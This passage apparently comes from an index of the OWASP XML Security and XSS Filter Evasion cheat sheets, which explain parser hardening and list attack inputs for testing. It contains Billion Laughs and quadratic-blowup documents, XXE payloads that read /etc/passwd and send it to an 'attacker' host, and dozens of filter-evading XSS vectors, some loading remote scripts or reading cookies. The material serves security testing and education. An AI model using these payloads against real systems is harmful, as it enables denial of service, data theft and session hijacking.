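        xmlif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        // Do not resolve external entities even if DTD support is left on.
        xmlif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

        XMLStreamReader xmlfer = xmlif.createXMLStreamReader(new FileInputStream("contacts.xml"));
        while (xmlfer.hasNext()) {
            xmlfer.next();
            if (xmlfer.hasText()) {
                System.out.print(xmlfer.getText());
            }
        }
    }
}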
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#recursive-entity-reference","title":"Recursive Entity Reference","text":"

When entity A is defined in terms of entity B, and entity B in turn references entity A, the schema describes a circular (recursive) reference between entities:

<!DOCTYPE A [\n <!ELEMENT A ANY>\n<!ENTITY A \"<A>&B;</A>\">\n <!ENTITY B \"&A;\">\n]>\n<A>&A;</A>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#quadratic-blowup","title":"Quadratic Blowup","text":"

Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)).

The result of the following attack will be 100,000 x 100,000 characters in memory.

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY A \"AAAAA...(a 100.000 A's)...AAAAA\">\n]>\n<root>&A;&A;&A;&A;...(a 100.000 &A;'s)...&A;&A;&A;&A;&A;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#billion-laughs","title":"Billion Laughs","text":"

When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<root>&LOL9;</root>\n

The entity LOL9 resolves to the 10 LOL8 entities it references; each of those resolves to 10 LOL7 entities, and so on. In the end the parser must expand 10^9 (1,000,000,000) copies of the innermost entity, roughly 3 GB of text, which will exhaust CPU and/or memory and could make the parser crash.
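
Beyond disabling DTDs altogether, a defensive backstop against expansion attacks is to keep the JAXP processing limits enabled and, optionally, lower the entity expansion limit. The following is a minimal sketch, assuming the JDK's built-in parser; the property name jdk.xml.entityExpansionLimit and its default value vary by JDK version, the file name billion-laughs.xml is hypothetical, and setting the property on the command line with -D is generally more reliable than setting it at runtime:

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

public class parseWithExpansionLimit {
    public static void main(String[] args) throws Exception {
        // Lower the JDK-wide entity expansion limit (the default is implementation
        // dependent; commonly 64,000 when secure processing is active).
        System.setProperty("jdk.xml.entityExpansionLimit", "100");

        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Secure processing turns on the JAXP processing limits for this factory.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        DocumentBuilder builder = factory.newDocumentBuilder();

        // Parsing a Billion Laughs style document should now fail fast with a
        // parse exception instead of exhausting memory.
        builder.parse("billion-laughs.xml");
    }
}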

The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages.

The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:

<?XML VERSION=\"1.0\" ENCODING=\"UTF-8\"?>\n<!DOCTYPE SOAP-ENV:ENVELOPE [\n <!ELEMENT SOAP-ENV:ENVELOPE ANY>\n<!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<SOAP:ENVELOPE ENTITYREFERENCE=\"&LOL9;\"\nXMLNS:SOAP=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\">\n<SOAP:BODY>\n<KEYWORD XMLNS=\"URN:PARASOFT:WS:STORE\">FOO</KEYWORD>\n</SOAP:BODY>\n</SOAP:ENVELOPE>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#reflected-file-retrieval","title":"Reflected File Retrieval","text":"

Consider the following example code of an XXE:

<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE root [\n <!ELEMENT includeme ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n]>\n<root>&xxe;</root>\n

The previous XML defines an entity named xxe, whose value is the contents of /etc/passwd and which will be expanded where it is referenced in the document. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#server-side-request-forgery","title":"Server Side Request Forgery","text":"

Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, or to perform brute force attacks on internal networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-dns-resolution","title":"External DNS Resolution","text":"

Sometimes it is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but it requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.

<!DOCTYPE m PUBLIC \"-//B/A/EN\" \"http://checkforthisspecificdomain.example.com\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-connection","title":"External Connection","text":"

Whenever there is an XXE and you cannot retrieve a file, you can test whether you are able to establish remote connections:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE root [\n <!ENTITY % xxe SYSTEM \"http://attacker/evil.dtd\">\n%xxe;\n]>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#file-retrieval-with-parameter-entities","title":"File Retrieval with Parameter Entities","text":"

Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:

<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE root [\n <!ENTITY % file SYSTEM \"file:///etc/passwd\">\n<!ENTITY % dtd SYSTEM \"http://attacker/evil.dtd\">\n%dtd;\n]>\n<root>&send;</root>\n

Here the DTD defines two external parameter entities: file, which loads a local file, and dtd, which loads a remote DTD. The remote DTD should contain something like this:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://example.com/?%file;'>\">\n%all;\n

The second DTD causes the system to send the contents of the file back to the attacker's server as a parameter of the URL.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#port-scanning","title":"Port Scanning","text":"

The amount and type of information disclosed will depend on the type of implementation. Responses can be classified as follows, ranging from easy to complex:

1) Complete Disclosure: This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what's going on by receiving the complete responses from the server being queried; you have an exact representation of what happened when connecting to the remote host.

2) Error-based: If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection:

java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80\n at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)\n at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)\n

3) Timeout-based: Timeouts can occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If a timeout occurs while trying to connect to a closed port (which may take one minute), while the response when connecting to a valid port is very quick (one second, for example), the difference between open and closed ports becomes quite clear.

4) Time-based: Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time per port to determine its status. This type of attack is difficult to accomplish on higher-latency networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#brute-forcing","title":"Brute Forcing","text":"

Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the username and password as part of the URI scheme (http, ftp, etc.), as in the following example:

<!DOCTYPE root [\n <!ENTITY user SYSTEM \"http://username:password@example.com:8080\">\n]>\n<root>&user;</root>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html","title":"XSS Filter Evasion Cheat Sheet","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS Cheat Sheet, which was at: http://ha.ckers.org/xss.html. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the Cross Site Scripting Prevention Cheat Sheet, was inspired by RSnake's XSS Cheat Sheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in a rather complex attack cheat sheet, and so the OWASP Cheat Sheet Series was born.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#tests","title":"Tests","text":"

This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS, a fact these tests can be used to illustrate.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#basic-xss-test-without-filter-evasion","title":"Basic XSS Test Without Filter Evasion","text":"

This is a normal XSS JavaScript injection and the most likely to get caught, but I suggest trying it first (the quotes are not required in any modern browser, so they are omitted here):

<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-locator-polygot","title":"XSS Locator (Polygot)","text":"

The following is a \"polyglot test XSS payload\" that will execute in multiple contexts, including HTML, script strings, JavaScript, and URLs. Thank you to Gareth Heyes for this contribution.

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-a-tags","title":"Malformed A Tags","text":"

Skip the HREF attribute and get to the meat of the XSS... Submitted by David Cross \~ Verified on Chrome

\\<a onmouseover=\"alert(document.cookie)\"\\>xxs link\\</a\\>

Alternatively, since Chrome loves to replace missing quotes for you, if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

\\<a onmouseover=alert(document.cookie)\\>xxs link\\</a\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-img-tags","title":"Malformed IMG Tags","text":"

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create an XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. It also makes it significantly more difficult to correctly parse apart HTML tags:

<IMG\u00a0\"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#fromcharcode","title":"fromCharCode","text":"

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-to-get-past-filters-that-check-src-domain","title":"Default SRC Tag to Get Past Filters that Check SRC Domain","text":"

This will bypass most SRC domain filters. Inserting JavaScript in an event handler also applies to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed, etc. It also allows any relevant event for the tag type to be substituted, such as onblur or onclick, giving you an extensive number of variations for many of the injections listed here. Submitted by David Cross.

Edited by Abdullah Hussam (@Abdulahhusam).

<IMG SRC=# onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-empty","title":"Default SRC Tag by Leaving it Empty","text":"

<IMG SRC= onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-out-entirely","title":"Default SRC Tag by Leaving it out Entirely","text":"

<IMG onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#on-error-alert","title":"On Error Alert","text":"

<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-onerror-and-javascript-alert-encode","title":"IMG onerror and JavaScript Alert Encode","text":"

<img src=x onerror=\"&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references","title":"Decimal HTML Character References","text":"

All of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode.

<IMG\u00a0SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references-without-trailing-semicolons","title":"Decimal HTML Character References Without Trailing Semicolons","text":"

This is often effective against XSS filters that look for \"&#XX;\", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =\~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an HTML-encoded string (I've seen this in the wild):

<IMG\u00a0SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hexadecimal-html-character-references-without-trailing-semicolons","title":"Hexadecimal HTML Character References Without Trailing Semicolons","text":"

This is also a viable XSS attack against the above string $tmp_string=\~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters.

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-tab","title":"Embedded Tab","text":"

Used to break up the cross site scripting attack:

<IMG SRC=\"jav ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-encoded-tab","title":"Embedded Encoded Tab","text":"

Use this one to break up XSS:

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-newline-to-break-up-xss","title":"Embedded Newline to Break-up XSS","text":"

Some websites claim that any of the characters 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following four XSS examples illustrate this vector:

<IMG\u00a0SRC=\"jav&#x0A;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-carriage-return-to-break-up-xss","title":"Embedded Carriage Return to Break-up XSS","text":"

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG\u00a0SRC=\"jav&#x0D;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#null-breaks-up-javascript-directive","title":"Null breaks up JavaScript Directive","text":"

Null chars also work as XSS vectors, but not like the above; you need to inject them directly using something like Burp Proxy, use %00 in the URL string, or, if you want to write your own injection tool, use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again: older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char, 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real-world filters with a variation on this example:

perl\u00a0-e\u00a0'print\u00a0\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";'\u00a0>\u00a0out

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#spaces-and-meta-chars-before-the-javascript-in-images-for-xss","title":"Spaces and Meta Chars Before the JavaScript in Images for XSS","text":"

This is useful if the pattern match doesn't take into account spaces in the word javascript: (which is correct, since that won't render) and makes the false assumption that you can't have a space between the quote and the javascript: keyword. In reality you can use any character from 1-32 in decimal:

<IMG SRC=\" &#14; javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#non-alpha-non-digit-xss","title":"Non-alpha-non-digit XSS","text":"

The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \\<SCRIPT\\\\s != \\<SCRIPT/XSS\\\\s:

<SCRIPT/XSS\u00a0SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

Based on the same idea as above, however expanded on it, using the RSnake fuzzer. The Gecko rendering engine allows any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc.) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char, as seen here:

<BODY\u00a0onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n

Yair Amit brought to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#extraneous-open-brackets","title":"Extraneous Open Brackets","text":"

Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#no-closing-script-tags","title":"No Closing Script Tags","text":"

In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \></SCRIPT> portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and adds closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're generally not needed; beware though, I have no idea what the HTML will end up looking like once this is injected:

<SCRIPT\u00a0SRC=http://xss.rocks/xss.js?<\u00a0B\u00a0>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-in-script-tags","title":"Protocol Resolution in Script Tags","text":"

This particular variant was submitted by \u0141ukasz Pilorz and was based partially on Ozh's protocol resolution bypass below. This cross site scripting example works in IE, in Netscape in IE rendering mode, and in Opera if you add a </SCRIPT> tag at the end. It is especially useful where space is an issue, and of course, the shorter your domain, the better. The \".j\" is valid regardless of the encoding type because the browser knows it in the context of a SCRIPT tag.

<SCRIPT\u00a0SRC=//xss.rocks/.j>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#half-open-htmljavascript-xss-vector","title":"Half Open HTML/JavaScript XSS Vector","text":"

Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is an HTML tag below where you are injecting this cross site scripting vector. Even though there is no close \">\" tag, the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\%3D)|(=))\[^\\n\]\*((\\%3C)|\<)\[^\\n\]+((\\%3E)|\>)/ because it doesn't require the end \">\". As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

<IMG\u00a0SRC=\"('XSS')\""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#double-open-angle-brackets","title":"Double Open Angle Brackets","text":"

Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<iframe\u00a0src=http://xss.rocks/scriptlet.html\u00a0<

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#escaping-javascript-escapes","title":"Escaping JavaScript Escapes","text":"

When the application is written to output some user information inside JavaScript like the following: <SCRIPT>var a=\"$ENV{QUERY\_STRING}\";</SCRIPT>, and you want to inject your own JavaScript into it but the server-side application escapes certain quotes, you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a=\"\\\\\";alert('XSS');//\";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method:

\\\";alert('XSS');//

An alternative, if correct JSON or JavaScript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:

</script><script>alert('XSS');</script>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#end-title-tag","title":"End Title Tag","text":"

This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#input-image","title":"INPUT Image","text":"

<INPUT\u00a0TYPE=\"IMAGE\"\u00a0SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-image","title":"BODY Image","text":"

<BODY\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-dynsrc","title":"IMG Dynsrc","text":"

<IMG\u00a0DYNSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-lowsrc","title":"IMG Lowsrc","text":"

<IMG\u00a0LOWSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#list-style-image","title":"List-style-image","text":"

Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<STYLE>li\u00a0{list-style-image:\u00a0url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#vbscript-in-an-image","title":"VBscript in an Image","text":"

<IMG\u00a0SRC='vbscript:msgbox(\"XSS\")'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#livescript-older-versions-of-netscape-only","title":"Livescript (older versions of Netscape only)","text":"

<IMG\u00a0SRC=\"livescript:[code]\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#svg-object-tag","title":"SVG Object Tag","text":"

<svg/onload=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ecmascript-6","title":"ECMAScript 6","text":"
Set.constructor`alert\\x28document.domain\\x29\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-tag","title":"BODY Tag","text":"

This method doesn't require using any variants of javascript: or <SCRIPT... to accomplish the XSS attack. Dan Crowley additionally noted that you can put a space before the equals sign (onload= != onload =):

<BODY\u00a0ONLOAD=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#event-handlers","title":"Event Handlers","text":"

Event handlers can be used in XSS attacks similar to the ones above (this is the most comprehensive list on the net at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.

The Dottoro Web Reference also has a nice list of events in JavaScript.

  1. FSCommand() (attacker can use this when executed from within an embedded Flash object)
  2. onAbort() (when user aborts the loading of an image)
  3. onActivate() (when object is set as the active element)
  4. onAfterPrint() (activates after user prints or previews print job)
  5. onAfterUpdate() (activates on data object after updating data in the source object)
  6. onBeforeActivate() (fires before the object is set as the active element)
  7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(\"Copy\") function)
  8. onBeforeCut() (attacker executes the attack string right before a selection is cut)
  9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
  10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
  11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(\"Paste\") function)
  12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(\"Print\") function).
  13. onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
  14. onBeforeUpdate() (activates on data object before updating data in the source object)
  15. onBegin() (the onbegin event fires immediately when the element's timeline begins)
  16. onBlur() (in the case where another popup is loaded and the window loses focus)
  17. onBounce() (fires when the behavior property of the marquee object is set to \"alternate\" and the contents of the marquee reach one side of the window)
  18. onCellChange() (fires when data changes in the data provider)
  19. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
  20. onClick() (someone clicks on a form)
  21. onContextMenu() (user would need to right click on attack area)
  22. onControlSelect() (fires when the user is about to make a control selection of the object)
  23. onCopy() (user needs to copy something or it can be exploited using the execCommand(\"Copy\") command)
  24. onCut() (user needs to copy something or it can be exploited using the execCommand(\"Cut\") command)
  25. onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
  26. onDataSetChanged() (fires when the data set exposed by a data source object changes)
  27. onDataSetComplete() (fires to indicate that all data is available from the data source object)
  28. onDblClick() (user double-clicks a form element or a link)
  29. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
  30. onDrag() (requires that the user drags an object)
  31. onDragEnd() (requires that the user drags an object)
  32. onDragLeave() (requires that the user drags an object off a valid location)
  33. onDragEnter() (requires that the user drags an object into a valid location)
  34. onDragOver() (requires that the user drags an object into a valid location)
  35. onDragDrop() (user drops an object (e.g. file) onto the browser window)
  36. onDragStart() (occurs when user starts drag operation)
  37. onDrop() (user drops an object (e.g. file) onto the browser window)
  38. onEnd() (the onEnd event fires when the timeline ends)
  39. onError() (loading of a document or image causes an error)
  40. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
  41. onFilterChange() (fires when a visual filter completes state change)
  42. onFinish() (attacker can create the exploit when marquee is finished looping)
  43. onFocus() (attacker executes the attack string when the window gets focus)
  44. onFocusIn() (attacker executes the attack string when window gets focus)
  45. onFocusOut() (attacker executes the attack string when the window loses focus)
  46. onHashChange() (fires when the fragment identifier part of the document's current address changed)
  47. onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
  48. onInput() (the text content of an element is changed through the user interface)
  49. onKeyDown() (user depresses a key)
  50. onKeyPress() (user presses or holds down a key)
  51. onKeyUp() (user releases a key)
  52. onLayoutComplete() (user would have to print or print preview)
  53. onLoad() (attacker executes the attack string after the window loads)
